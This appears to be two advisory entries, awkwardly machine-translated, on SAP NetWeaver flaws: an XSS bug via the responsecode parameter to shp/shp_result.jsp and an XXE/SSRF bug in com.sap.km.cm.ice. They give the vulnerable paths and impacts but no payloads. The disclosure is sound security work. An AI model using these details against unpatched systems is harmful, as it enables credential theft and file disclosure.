SDK

Cross-site scripting (XSS) vulnerability in the DataArchivingService servlet in SAP NetWeaver Portal 7.4 allows remote attackers to inject arbitrary web script or HTML via the responsecode parameter to shp/shp_result.jsp, aka SAP Security Note 2308535. Vendors have confirmed this vulnerability SAP Security Note 2308535 It is released as.Information may be obtained and information may be altered. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks

XML external entity (XXE) vulnerability in com.sap.km.cm.ice in SAP NetWeaver AS JAVA 7.5 allows remote authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request, aka SAP Security Note 2387249. SAP NetWeaver AS JAVA Is XML An external entity vulnerability exists. Vendors have confirmed this vulnerability SAP Security Note 2387249 It is released as.Information may be obtained. Attackers can exploit this issue to gain access to sensitive information or cause denial-of-service conditions